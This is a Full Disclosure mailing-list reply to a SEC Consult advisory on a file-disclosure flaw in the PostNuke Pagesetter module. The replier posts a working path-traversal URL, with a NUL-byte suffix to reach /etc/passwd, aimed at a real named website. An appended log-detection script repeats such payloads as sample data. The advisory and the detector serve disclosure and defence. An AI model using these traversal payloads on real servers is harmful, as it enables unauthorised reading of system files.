Full Disclosure mailing list archives

Re: SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke


From: Matthew Flaschen <matthew.flaschen () gatech edu>
Date: Tue, 27 Feb 2007 04:02:05 -0500

research () sec-consult com wrote:
SEC Consult Security Advisory 20070226-0
=======================================================================
                  title: File Disclosure in Pagesetter for PostNuke
                program: Pagesetter page creation module
     vulnerable version: 6.2.0
                         6.3.0 beta 5
                 impact: high
               homepage: http://www.elfisk.dk
                  found: 2006-11-21
                     by: D. Matscheko / SEC-CONSULT / www.sec-consult.com
=======================================================================

vendor description:
---------------

Pagesetter is a publishing module that allows the PostNuke users to
create web pages from structured data, with the data structure and
output templates defined by the PostNuke administrator.

[Source: http://www.elfisk.dk]


I think brendanb's going to be busy.

http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00

Attachment: signature.asc
Description: OpenPGP digital signature
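
Added example (not part of the original post or the advisory): a log check for the request shape shown in the message above, flagging Pagesetter preview requests whose id parameter carries a traversal sequence or a NUL byte, including double-encoded forms. The log lines, function names and the case-insensitive module match are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Feb/2007:09:14:02 +0000] "GET /index.php?module=Pagesetter'
    '&type=file&func=preview&id=../../../../etc/passwd%00 HTTP/1.1" 200 1432',
    '192.0.2.11 - - [27/Feb/2007:09:15:40 +0000] "GET /index.php?module=Pagesetter'
    '&type=file&func=preview&id=%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 200 1432',
    '192.0.2.12 - - [27/Feb/2007:09:16:05 +0000] "GET /index.php?module=Pagesetter'
    '&type=file&func=preview&id=42 HTTP/1.1" 200 5120',
    '192.0.2.13 - - [27/Feb/2007:09:17:31 +0000] "GET /index.php?module=News'
    '&func=view&id=../x HTTP/1.1" 404 210',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e) so nested encodings cannot hide '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_reasons(line):
    """Return the reasons a log line looks like a Pagesetter preview file-read attempt."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    # parse_qs already removes one layer of percent-encoding.
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    first = lambda name: params.get(name, [""])[0]
    if first("module").lower() != "pagesetter" or first("func").lower() != "preview":
        return []
    file_id = fully_decode(first("id"))
    reasons = []
    if "\x00" in file_id:
        reasons.append("nul-byte")
    # Split on both separators and look for a parent-directory segment.
    if ".." in re.split(r"[\\/]", file_id.replace("\x00", "")):
        reasons.append("traversal")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged line, 1-indexed."""
    hits = [(n, suspicious_reasons(l)) for n, l in enumerate(lines, 1)]
    return [(n, r) for n, r in hits if r]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, ",".join(reasons))
```
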

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
